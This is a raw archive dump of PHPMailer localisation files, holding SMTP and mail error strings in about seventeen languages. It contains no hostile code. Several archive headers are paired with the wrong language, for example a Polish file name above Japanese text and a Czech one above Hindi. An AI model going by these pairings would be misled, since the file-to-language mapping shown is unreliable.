$PHPMAILER_LANG['invalid_address'] = 'כתובת שגויה: '; $PHPMAILER_LANG['encoding'] = 'קידוד לא מוכר: '; $PHPMAILER_LANG['execute'] = 'לא הצלחתי להפעיל את: '; $PHPMAILER_LANG['file_access'] = 'לא ניתן לגשת לקובץ: '; $PHPMAILER_LANG['file_open'] = 'שגיאת קובץ: לא ניתן לגשת לקובץ: '; $PHPMAILER_LANG['from_failed'] = 'כתובות הנמענים הבאות נכשלו: '; $PHPMAILER_LANG['instantiate'] = 'לא הצלחתי להפעיל את פונקציית המייל.'; $PHPMAILER_LANG['mailer_not_supported'] = ' אינה נתמכת.'; $PHPMAILER_LANG['provide_address'] = 'חובה לספק לפחות כתובת אחת של מקבל המייל.'; $PHPMAILER_LANG['recipients_failed'] = 'שגיאת SMTP: הנמענים הבאים נכשלו: '; $PHPMAILER_LANG['signing'] = 'שגיאת חתימה: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() failed.'; $PHPMAILER_LANG['smtp_error'] = 'שגיאת שרת SMTP: '; $PHPMAILER_LANG['variable_set'] = 'לא ניתן לקבוע או לשנות את המשתנה: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-es.php000064400000003777151032724670021413 0ustar00 * @author Crystopher Glodzienski Cardoso */ $PHPMAILER_LANG['authenticate'] = 'Error SMTP: Imposible autentificar.'; $PHPMAILER_LANG['connect_host'] = 'Error SMTP: Imposible conectar al servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Error SMTP: Datos no aceptados.'; $PHPMAILER_LANG['empty_message'] = 'El cuerpo del mensaje está vacío.'; $PHPMAILER_LANG['encoding'] = 'Codificación desconocida: '; $PHPMAILER_LANG['execute'] = 'Imposible ejecutar: '; $PHPMAILER_LANG['file_access'] = 'Imposible acceder al archivo: '; $PHPMAILER_LANG['file_open'] = 'Error de Archivo: Imposible abrir el archivo: '; $PHPMAILER_LANG['from_failed'] = 'La(s) siguiente(s) direcciones de remitente fallaron: '; $PHPMAILER_LANG['instantiate'] = 'Imposible crear una instancia de la función Mail.'; $PHPMAILER_LANG['invalid_address'] = 'Imposible enviar: dirección de email inválido: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer no está soportado.'; $PHPMAILER_LANG['provide_address'] = 'Debe proporcionar al menos una dirección de email de destino.'; $PHPMAILER_LANG['recipients_failed'] = 'Error SMTP: Los siguientes destinos fallaron: '; $PHPMAILER_LANG['signing'] = 'Error al firmar: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() falló.'; $PHPMAILER_LANG['smtp_error'] = 'Error del servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'No se pudo configurar la variable: '; $PHPMAILER_LANG['extension_missing'] = 'Extensión faltante: '; $PHPMAILER_LANG['smtp_code'] = 'Código del servidor SMTP: '; $PHPMAILER_LANG['smtp_code_ex'] = 'Información adicional del servidor SMTP: '; $PHPMAILER_LANG['invalid_header'] = 'Nombre o valor de encabezado no válido'; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-ba.php000064400000003321151032724670021347 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP Greška: Neuspjela prijava.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Greška: Nije moguće spojiti se sa SMTP serverom.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Greška: Podatci nisu prihvaćeni.'; $PHPMAILER_LANG['empty_message'] = 'Sadržaj poruke je prazan.'; $PHPMAILER_LANG['encoding'] = 'Nepoznata kriptografija: '; $PHPMAILER_LANG['execute'] = 'Nije moguće izvršiti naredbu: '; $PHPMAILER_LANG['file_access'] = 'Nije moguće pristupiti datoteci: '; $PHPMAILER_LANG['file_open'] = 'Nije moguće otvoriti datoteku: '; $PHPMAILER_LANG['from_failed'] = 'SMTP Greška: Slanje sa navedenih e-mail adresa nije uspjelo: '; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Greška: Slanje na navedene e-mail adrese nije uspjelo: '; $PHPMAILER_LANG['instantiate'] = 'Ne mogu pokrenuti mail funkcionalnost.'; $PHPMAILER_LANG['invalid_address'] = 'E-mail nije poslan. Neispravna e-mail adresa: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer nije podržan.'; $PHPMAILER_LANG['provide_address'] = 'Definišite barem jednu adresu primaoca.'; $PHPMAILER_LANG['signing'] = 'Greška prilikom prijave: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Spajanje na SMTP server nije uspjelo.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP greška: '; $PHPMAILER_LANG['variable_set'] = 'Nije moguće postaviti varijablu ili je vratiti nazad: '; $PHPMAILER_LANG['extension_missing'] = 'Nedostaje ekstenzija: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-pl.php000064400000003546151032724670021411 0ustar00 * @author Yoshi Sakai * @author Arisophy */ $PHPMAILER_LANG['authenticate'] = 'SMTPエラー: 認証できませんでした。'; $PHPMAILER_LANG['connect_host'] = 'SMTPエラー: SMTPホストに接続できませんでした。'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTPエラー: データが受け付けられませんでした。'; $PHPMAILER_LANG['empty_message'] = 'メール本文が空です。'; $PHPMAILER_LANG['encoding'] = '不明なエンコーディング: '; $PHPMAILER_LANG['execute'] = '実行できませんでした: '; $PHPMAILER_LANG['file_access'] = 'ファイルにアクセスできません: '; $PHPMAILER_LANG['file_open'] = 'ファイルエラー: ファイルを開けません: '; $PHPMAILER_LANG['from_failed'] = 'Fromアドレスを登録する際にエラーが発生しました: '; $PHPMAILER_LANG['instantiate'] = 'メール関数が正常に動作しませんでした。'; $PHPMAILER_LANG['invalid_address'] = '不正なメールアドレス: '; $PHPMAILER_LANG['provide_address'] = '少なくとも1つメールアドレスを 指定する必要があります。'; $PHPMAILER_LANG['mailer_not_supported'] = ' メーラーがサポートされていません。'; $PHPMAILER_LANG['recipients_failed'] = 'SMTPエラー: 次の受信者アドレスに 間違いがあります: '; $PHPMAILER_LANG['signing'] = '署名エラー: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP接続に失敗しました。'; $PHPMAILER_LANG['smtp_error'] = 'SMTPサーバーエラー: '; $PHPMAILER_LANG['variable_set'] = '変数が存在しません: '; $PHPMAILER_LANG['extension_missing'] = '拡張機能が見つかりません: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-fa.php000064400000004037151032724670021360 0ustar00 * @author Mohammad Hossein Mojtahedi */ $PHPMAILER_LANG['authenticate'] = 'خطای SMTP: احراز هویت با شکست مواجه شد.'; $PHPMAILER_LANG['connect_host'] = 'خطای SMTP: اتصال به سرور SMTP برقرار نشد.'; $PHPMAILER_LANG['data_not_accepted'] = 'خطای SMTP: داده‌ها نا‌درست هستند.'; $PHPMAILER_LANG['empty_message'] = 'بخش متن پیام خالی است.'; $PHPMAILER_LANG['encoding'] = 'کد‌گذاری نا‌شناخته: '; $PHPMAILER_LANG['execute'] = 'امکان اجرا وجود ندارد: '; $PHPMAILER_LANG['file_access'] = 'امکان دسترسی به فایل وجود ندارد: '; $PHPMAILER_LANG['file_open'] = 'خطای File: امکان بازکردن فایل وجود ندارد: '; $PHPMAILER_LANG['from_failed'] = 'آدرس فرستنده اشتباه است: '; $PHPMAILER_LANG['instantiate'] = 'امکان معرفی تابع ایمیل وجود ندارد.'; $PHPMAILER_LANG['invalid_address'] = 'آدرس ایمیل معتبر نیست: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer پشتیبانی نمی‌شود.'; $PHPMAILER_LANG['provide_address'] = 'باید حداقل یک آدرس گیرنده وارد کنید.'; $PHPMAILER_LANG['recipients_failed'] = 'خطای SMTP: ارسال به آدرس گیرنده با خطا مواجه شد: '; $PHPMAILER_LANG['signing'] = 'خطا در امضا: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'خطا در اتصال به SMTP.'; $PHPMAILER_LANG['smtp_error'] = 'خطا در SMTP Server: '; $PHPMAILER_LANG['variable_set'] = 'امکان ارسال یا ارسال مجدد متغیر‌ها وجود ندارد: '; $PHPMAILER_LANG['extension_missing'] = 'افزونه موجود نیست: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-it.php000064400000003433151032724670021405 0ustar00 * @author Stefano Sabatini */ $PHPMAILER_LANG['authenticate'] = 'SMTP Error: Impossibile autenticarsi.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Error: Impossibile connettersi all\'host SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Error: Dati non accettati dal server.'; $PHPMAILER_LANG['empty_message'] = 'Il corpo del messaggio è vuoto'; $PHPMAILER_LANG['encoding'] = 'Codifica dei caratteri sconosciuta: '; $PHPMAILER_LANG['execute'] = 'Impossibile eseguire l\'operazione: '; $PHPMAILER_LANG['file_access'] = 'Impossibile accedere al file: '; $PHPMAILER_LANG['file_open'] = 'File Error: Impossibile aprire il file: '; $PHPMAILER_LANG['from_failed'] = 'I seguenti indirizzi mittenti hanno generato errore: '; $PHPMAILER_LANG['instantiate'] = 'Impossibile istanziare la funzione mail'; $PHPMAILER_LANG['invalid_address'] = 'Impossibile inviare, l\'indirizzo email non è valido: '; $PHPMAILER_LANG['provide_address'] = 'Deve essere fornito almeno un indirizzo ricevente'; $PHPMAILER_LANG['mailer_not_supported'] = 'Mailer non supportato'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Error: I seguenti indirizzi destinatari hanno generato un errore: '; $PHPMAILER_LANG['signing'] = 'Errore nella firma: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() fallita.'; $PHPMAILER_LANG['smtp_error'] = 'Errore del server SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Impossibile impostare o resettare la variabile: '; $PHPMAILER_LANG['extension_missing'] = 'Estensione mancante: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-lv.php000064400000003153151032724670021411 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP kļūda: Autorizācija neizdevās.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Kļūda: Nevar izveidot savienojumu ar SMTP serveri.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Kļūda: Nepieņem informāciju.'; $PHPMAILER_LANG['empty_message'] = 'Ziņojuma teksts ir tukšs'; $PHPMAILER_LANG['encoding'] = 'Neatpazīts kodējums: '; $PHPMAILER_LANG['execute'] = 'Neizdevās izpildīt komandu: '; $PHPMAILER_LANG['file_access'] = 'Fails nav pieejams: '; $PHPMAILER_LANG['file_open'] = 'Faila kļūda: Nevar atvērt failu: '; $PHPMAILER_LANG['from_failed'] = 'Nepareiza sūtītāja adrese: '; $PHPMAILER_LANG['instantiate'] = 'Nevar palaist sūtīšanas funkciju.'; $PHPMAILER_LANG['invalid_address'] = 'Nepareiza adrese: '; $PHPMAILER_LANG['mailer_not_supported'] = ' sūtītājs netiek atbalstīts.'; $PHPMAILER_LANG['provide_address'] = 'Lūdzu, norādiet vismaz vienu adresātu.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP kļūda: neizdevās nosūtīt šādiem saņēmējiem: '; $PHPMAILER_LANG['signing'] = 'Autorizācijas kļūda: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP savienojuma kļūda'; $PHPMAILER_LANG['smtp_error'] = 'SMTP servera kļūda: '; $PHPMAILER_LANG['variable_set'] = 'Nevar piešķirt mainīgā vērtību: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-ro.php000064400000004620151032724670021410 0ustar00 * @author Peter Dave Hello <@PeterDaveHello/> * @author Jason Chiang */ $PHPMAILER_LANG['authenticate'] = 'SMTP 錯誤:登入失敗。'; $PHPMAILER_LANG['connect_host'] = 'SMTP 錯誤:無法連線到 SMTP 主機。'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP 錯誤:無法接受的資料。'; $PHPMAILER_LANG['empty_message'] = '郵件內容為空'; $PHPMAILER_LANG['encoding'] = '未知編碼: '; $PHPMAILER_LANG['execute'] = '無法執行:'; $PHPMAILER_LANG['file_access'] = '無法存取檔案:'; $PHPMAILER_LANG['file_open'] = '檔案錯誤:無法開啟檔案:'; $PHPMAILER_LANG['from_failed'] = '發送地址錯誤:'; $PHPMAILER_LANG['instantiate'] = '未知函數呼叫。'; $PHPMAILER_LANG['invalid_address'] = '因為電子郵件地址無效,無法傳送: '; $PHPMAILER_LANG['mailer_not_supported'] = '不支援的發信客戶端。'; $PHPMAILER_LANG['provide_address'] = '必須提供至少一個收件人地址。'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP 錯誤:以下收件人地址錯誤:'; $PHPMAILER_LANG['signing'] = '電子簽章錯誤: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP 連線失敗'; $PHPMAILER_LANG['smtp_error'] = 'SMTP 伺服器錯誤: '; $PHPMAILER_LANG['variable_set'] = '無法設定或重設變數: '; $PHPMAILER_LANG['extension_missing'] = '遺失模組 Extension: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-ca.php000064400000003302151032724670021347 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'Error SMTP: No s’ha pogut autenticar.'; $PHPMAILER_LANG['connect_host'] = 'Error SMTP: No es pot connectar al servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Error SMTP: Dades no acceptades.'; $PHPMAILER_LANG['empty_message'] = 'El cos del missatge està buit.'; $PHPMAILER_LANG['encoding'] = 'Codificació desconeguda: '; $PHPMAILER_LANG['execute'] = 'No es pot executar: '; $PHPMAILER_LANG['file_access'] = 'No es pot accedir a l’arxiu: '; $PHPMAILER_LANG['file_open'] = 'Error d’Arxiu: No es pot obrir l’arxiu: '; $PHPMAILER_LANG['from_failed'] = 'La(s) següent(s) adreces de remitent han fallat: '; $PHPMAILER_LANG['instantiate'] = 'No s’ha pogut crear una instància de la funció Mail.'; $PHPMAILER_LANG['invalid_address'] = 'Adreça d’email invalida: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer no està suportat'; $PHPMAILER_LANG['provide_address'] = 'S’ha de proveir almenys una adreça d’email com a destinatari.'; $PHPMAILER_LANG['recipients_failed'] = 'Error SMTP: Els següents destinataris han fallat: '; $PHPMAILER_LANG['signing'] = 'Error al signar: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Ha fallat el SMTP Connect().'; $PHPMAILER_LANG['smtp_error'] = 'Error del servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'No s’ha pogut establir o restablir la variable: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-tl.php000064400000003271151032724670021410 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP Error: Hindi mapatotohanan.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Error: Hindi makakonekta sa SMTP host.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Error: Ang datos ay hindi naitanggap.'; $PHPMAILER_LANG['empty_message'] = 'Walang laman ang mensahe'; $PHPMAILER_LANG['encoding'] = 'Hindi alam ang encoding: '; $PHPMAILER_LANG['execute'] = 'Hindi maisasagawa: '; $PHPMAILER_LANG['file_access'] = 'Hindi ma-access ang file: '; $PHPMAILER_LANG['file_open'] = 'File Error: Hindi mabuksan ang file: '; $PHPMAILER_LANG['from_failed'] = 'Ang sumusunod na address ay nabigo: '; $PHPMAILER_LANG['instantiate'] = 'Hindi maisimulan ang instance ng mail function.'; $PHPMAILER_LANG['invalid_address'] = 'Hindi wasto ang address na naibigay: '; $PHPMAILER_LANG['mailer_not_supported'] = 'Ang mailer ay hindi suportado.'; $PHPMAILER_LANG['provide_address'] = 'Kailangan mong magbigay ng kahit isang email address na tatanggap.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Error: Ang mga sumusunod na tatanggap ay nabigo: '; $PHPMAILER_LANG['signing'] = 'Hindi ma-sign: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Ang SMTP connect() ay nabigo.'; $PHPMAILER_LANG['smtp_error'] = 'Ang server ng SMTP ay nabigo: '; $PHPMAILER_LANG['variable_set'] = 'Hindi matatakda o ma-reset ang mga variables: '; $PHPMAILER_LANG['extension_missing'] = 'Nawawala ang extension: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-hy.php000064400000004211151032724670021404 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP -ի սխալ: չհաջողվեց ստուգել իսկությունը.'; $PHPMAILER_LANG['connect_host'] = 'SMTP -ի սխալ: չհաջողվեց կապ հաստատել SMTP սերվերի հետ.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP -ի սխալ: տվյալները ընդունված չեն.'; $PHPMAILER_LANG['empty_message'] = 'Հաղորդագրությունը դատարկ է'; $PHPMAILER_LANG['encoding'] = 'Կոդավորման անհայտ տեսակ: '; $PHPMAILER_LANG['execute'] = 'Չհաջողվեց իրականացնել հրամանը: '; $PHPMAILER_LANG['file_access'] = 'Ֆայլը հասանելի չէ: '; $PHPMAILER_LANG['file_open'] = 'Ֆայլի սխալ: ֆայլը չհաջողվեց բացել: '; $PHPMAILER_LANG['from_failed'] = 'Ուղարկողի հետևյալ հասցեն սխալ է: '; $PHPMAILER_LANG['instantiate'] = 'Հնարավոր չէ կանչել mail ֆունկցիան.'; $PHPMAILER_LANG['invalid_address'] = 'Հասցեն սխալ է: '; $PHPMAILER_LANG['mailer_not_supported'] = ' փոստային սերվերի հետ չի աշխատում.'; $PHPMAILER_LANG['provide_address'] = 'Անհրաժեշտ է տրամադրել գոնե մեկ ստացողի e-mail հասցե.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP -ի սխալ: չի հաջողվել ուղարկել հետևյալ ստացողների հասցեներին: '; $PHPMAILER_LANG['signing'] = 'Ստորագրման սխալ: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP -ի connect() ֆունկցիան չի հաջողվել'; $PHPMAILER_LANG['smtp_error'] = 'SMTP սերվերի սխալ: '; $PHPMAILER_LANG['variable_set'] = 'Չի հաջողվում ստեղծել կամ վերափոխել փոփոխականը: '; $PHPMAILER_LANG['extension_missing'] = 'Հավելվածը բացակայում է: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-vi.php000064400000003401151032724670021402 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'Lỗi SMTP: Không thể xác thực.'; $PHPMAILER_LANG['connect_host'] = 'Lỗi SMTP: Không thể kết nối máy chủ SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Lỗi SMTP: Dữ liệu không được chấp nhận.'; $PHPMAILER_LANG['empty_message'] = 'Không có nội dung'; $PHPMAILER_LANG['encoding'] = 'Mã hóa không xác định: '; $PHPMAILER_LANG['execute'] = 'Không thực hiện được: '; $PHPMAILER_LANG['file_access'] = 'Không thể truy cập tệp tin '; $PHPMAILER_LANG['file_open'] = 'Lỗi Tập tin: Không thể mở tệp tin: '; $PHPMAILER_LANG['from_failed'] = 'Lỗi địa chỉ gửi đi: '; $PHPMAILER_LANG['instantiate'] = 'Không dùng được các hàm gửi thư.'; $PHPMAILER_LANG['invalid_address'] = 'Đại chỉ emai không đúng: '; $PHPMAILER_LANG['mailer_not_supported'] = ' trình gửi thư không được hỗ trợ.'; $PHPMAILER_LANG['provide_address'] = 'Bạn phải cung cấp ít nhất một địa chỉ người nhận.'; $PHPMAILER_LANG['recipients_failed'] = 'Lỗi SMTP: lỗi địa chỉ người nhận: '; $PHPMAILER_LANG['signing'] = 'Lỗi đăng nhập: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Lỗi kết nối với SMTP'; $PHPMAILER_LANG['smtp_error'] = 'Lỗi máy chủ smtp '; $PHPMAILER_LANG['variable_set'] = 'Không thể thiết lập hoặc thiết lập lại biến: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-ms.php000064400000003306151032724670021407 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'Ralat SMTP: Tidak dapat pengesahan.'; $PHPMAILER_LANG['connect_host'] = 'Ralat SMTP: Tidak dapat menghubungi hos pelayan SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Ralat SMTP: Data tidak diterima oleh pelayan.'; $PHPMAILER_LANG['empty_message'] = 'Tiada isi untuk mesej'; $PHPMAILER_LANG['encoding'] = 'Pengekodan tidak diketahui: '; $PHPMAILER_LANG['execute'] = 'Tidak dapat melaksanakan: '; $PHPMAILER_LANG['file_access'] = 'Tidak dapat mengakses fail: '; $PHPMAILER_LANG['file_open'] = 'Ralat Fail: Tidak dapat membuka fail: '; $PHPMAILER_LANG['from_failed'] = 'Berikut merupakan ralat dari alamat e-mel: '; $PHPMAILER_LANG['instantiate'] = 'Tidak dapat memberi contoh fungsi e-mel.'; $PHPMAILER_LANG['invalid_address'] = 'Alamat emel tidak sah: '; $PHPMAILER_LANG['mailer_not_supported'] = ' jenis penghantar emel tidak disokong.'; $PHPMAILER_LANG['provide_address'] = 'Anda perlu menyediakan sekurang-kurangnya satu alamat e-mel penerima.'; $PHPMAILER_LANG['recipients_failed'] = 'Ralat SMTP: Penerima e-mel berikut telah gagal: '; $PHPMAILER_LANG['signing'] = 'Ralat pada tanda tangan: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() telah gagal.'; $PHPMAILER_LANG['smtp_error'] = 'Ralat pada pelayan SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Tidak boleh menetapkan atau menetapkan semula pembolehubah: '; $PHPMAILER_LANG['extension_missing'] = 'Sambungan hilang: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-da.php000064400000004044151032724670021354 0ustar00 * Rewrite and extension of the work by Mikael Stokkebro * */ $PHPMAILER_LANG['authenticate'] = 'SMTP fejl: Login mislykkedes.'; $PHPMAILER_LANG['connect_host'] = 'SMTP fejl: Forbindelse til SMTP serveren kunne ikke oprettes.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP fejl: Data blev ikke accepteret.'; $PHPMAILER_LANG['empty_message'] = 'Meddelelsen er uden indhold'; $PHPMAILER_LANG['encoding'] = 'Ukendt encode-format: '; $PHPMAILER_LANG['execute'] = 'Kunne ikke afvikle: '; $PHPMAILER_LANG['extension_missing'] = 'Udvidelse mangler: '; $PHPMAILER_LANG['file_access'] = 'Kunne ikke tilgå filen: '; $PHPMAILER_LANG['file_open'] = 'Fil fejl: Kunne ikke åbne filen: '; $PHPMAILER_LANG['from_failed'] = 'Følgende afsenderadresse er forkert: '; $PHPMAILER_LANG['instantiate'] = 'Email funktionen kunne ikke initialiseres.'; $PHPMAILER_LANG['invalid_address'] = 'Udgyldig adresse: '; $PHPMAILER_LANG['invalid_header'] = 'Ugyldig header navn eller værdi'; $PHPMAILER_LANG['invalid_hostentry'] = 'Ugyldig hostentry: '; $PHPMAILER_LANG['invalid_host'] = 'Ugyldig vært: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer understøttes ikke.'; $PHPMAILER_LANG['provide_address'] = 'Indtast mindst en modtagers email adresse.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP fejl: Følgende modtagere fejlede: '; $PHPMAILER_LANG['signing'] = 'Signeringsfejl: '; $PHPMAILER_LANG['smtp_code'] = 'SMTP kode: '; $PHPMAILER_LANG['smtp_code_ex'] = 'Yderligere SMTP info: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() fejlede.'; $PHPMAILER_LANG['smtp_detail'] = 'Detalje: '; $PHPMAILER_LANG['smtp_error'] = 'SMTP server fejl: '; $PHPMAILER_LANG['variable_set'] = 'Kunne ikke definere eller nulstille variablen: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-hu.php000064400000003265151032724670021410 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP-fout: authenticatie mislukt.'; $PHPMAILER_LANG['buggy_php'] = 'PHP versie gededecteerd die onderhavig is aan een bug die kan resulteren in gecorrumpeerde berichten. Om dit te voorkomen, gebruik SMTP voor het verzenden van berichten, zet de mail.add_x_header optie in uw php.ini file uit, gebruik MacOS of Linux, of pas de gebruikte PHP versie aan naar versie 7.0.17+ or 7.1.3+.'; $PHPMAILER_LANG['connect_host'] = 'SMTP-fout: kon niet verbinden met SMTP-host.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP-fout: data niet geaccepteerd.'; $PHPMAILER_LANG['empty_message'] = 'Berichttekst is leeg'; $PHPMAILER_LANG['encoding'] = 'Onbekende codering: '; $PHPMAILER_LANG['execute'] = 'Kon niet uitvoeren: '; $PHPMAILER_LANG['extension_missing'] = 'Extensie afwezig: '; $PHPMAILER_LANG['file_access'] = 'Kreeg geen toegang tot bestand: '; $PHPMAILER_LANG['file_open'] = 'Bestandsfout: kon bestand niet openen: '; $PHPMAILER_LANG['from_failed'] = 'Het volgende afzendersadres is mislukt: '; $PHPMAILER_LANG['instantiate'] = 'Kon mailfunctie niet initialiseren.'; $PHPMAILER_LANG['invalid_address'] = 'Ongeldig adres: '; $PHPMAILER_LANG['invalid_header'] = 'Ongeldige header naam of waarde'; $PHPMAILER_LANG['invalid_hostentry'] = 'Ongeldige hostentry: '; $PHPMAILER_LANG['invalid_host'] = 'Ongeldige host: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer wordt niet ondersteund.'; $PHPMAILER_LANG['provide_address'] = 'Er moet minstens één ontvanger worden opgegeven.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP-fout: de volgende ontvangers zijn mislukt: '; $PHPMAILER_LANG['signing'] = 'Signeerfout: '; $PHPMAILER_LANG['smtp_code'] = 'SMTP code: '; $PHPMAILER_LANG['smtp_code_ex'] = 'Aanvullende SMTP informatie: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Verbinding mislukt.'; $PHPMAILER_LANG['smtp_detail'] = 'Detail: '; $PHPMAILER_LANG['smtp_error'] = 'SMTP-serverfout: '; $PHPMAILER_LANG['variable_set'] = 'Kan de volgende variabele niet instellen of resetten: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-ru.php000064400000004307151032724670021420 0ustar00 * @author Foster Snowhill */ $PHPMAILER_LANG['authenticate'] = 'Ошибка SMTP: ошибка авторизации.'; $PHPMAILER_LANG['connect_host'] = 'Ошибка SMTP: не удается подключиться к SMTP-серверу.'; $PHPMAILER_LANG['data_not_accepted'] = 'Ошибка SMTP: данные не приняты.'; $PHPMAILER_LANG['encoding'] = 'Неизвестная кодировка: '; $PHPMAILER_LANG['execute'] = 'Невозможно выполнить команду: '; $PHPMAILER_LANG['file_access'] = 'Нет доступа к файлу: '; $PHPMAILER_LANG['file_open'] = 'Файловая ошибка: не удаётся открыть файл: '; $PHPMAILER_LANG['from_failed'] = 'Неверный адрес отправителя: '; $PHPMAILER_LANG['instantiate'] = 'Невозможно запустить функцию mail().'; $PHPMAILER_LANG['provide_address'] = 'Пожалуйста, введите хотя бы один email-адрес получателя.'; $PHPMAILER_LANG['mailer_not_supported'] = ' — почтовый сервер не поддерживается.'; $PHPMAILER_LANG['recipients_failed'] = 'Ошибка SMTP: не удалась отправка таким адресатам: '; $PHPMAILER_LANG['empty_message'] = 'Пустое сообщение'; $PHPMAILER_LANG['invalid_address'] = 'Не отправлено из-за неправильного формата email-адреса: '; $PHPMAILER_LANG['signing'] = 'Ошибка подписи: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Ошибка соединения с SMTP-сервером'; $PHPMAILER_LANG['smtp_error'] = 'Ошибка SMTP-сервера: '; $PHPMAILER_LANG['variable_set'] = 'Невозможно установить или сбросить переменную: '; $PHPMAILER_LANG['extension_missing'] = 'Расширение отсутствует: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-cs.php000064400000003406151032724670021376 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP त्रुटि: प्रामाणिकता की जांच नहीं हो सका। '; $PHPMAILER_LANG['connect_host'] = 'SMTP त्रुटि: SMTP सर्वर से कनेक्ट नहीं हो सका। '; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP त्रुटि: डेटा स्वीकार नहीं किया जाता है। '; $PHPMAILER_LANG['empty_message'] = 'संदेश खाली है। '; $PHPMAILER_LANG['encoding'] = 'अज्ञात एन्कोडिंग प्रकार। '; $PHPMAILER_LANG['execute'] = 'आदेश को निष्पादित करने में विफल। '; $PHPMAILER_LANG['file_access'] = 'फ़ाइल उपलब्ध नहीं है। '; $PHPMAILER_LANG['file_open'] = 'फ़ाइल त्रुटि: फाइल को खोला नहीं जा सका। '; $PHPMAILER_LANG['from_failed'] = 'प्रेषक का पता गलत है। '; $PHPMAILER_LANG['instantiate'] = 'मेल फ़ंक्शन कॉल नहीं कर सकता है।'; $PHPMAILER_LANG['invalid_address'] = 'पता गलत है। '; $PHPMAILER_LANG['mailer_not_supported'] = 'मेल सर्वर के साथ काम नहीं करता है। '; $PHPMAILER_LANG['provide_address'] = 'आपको कम से कम एक प्राप्तकर्ता का ई-मेल पता प्रदान करना होगा।'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP त्रुटि: निम्न प्राप्तकर्ताओं को पते भेजने में विफल। '; $PHPMAILER_LANG['signing'] = 'साइनअप त्रुटि:। '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP का connect () फ़ंक्शन विफल हुआ। '; $PHPMAILER_LANG['smtp_error'] = 'SMTP सर्वर 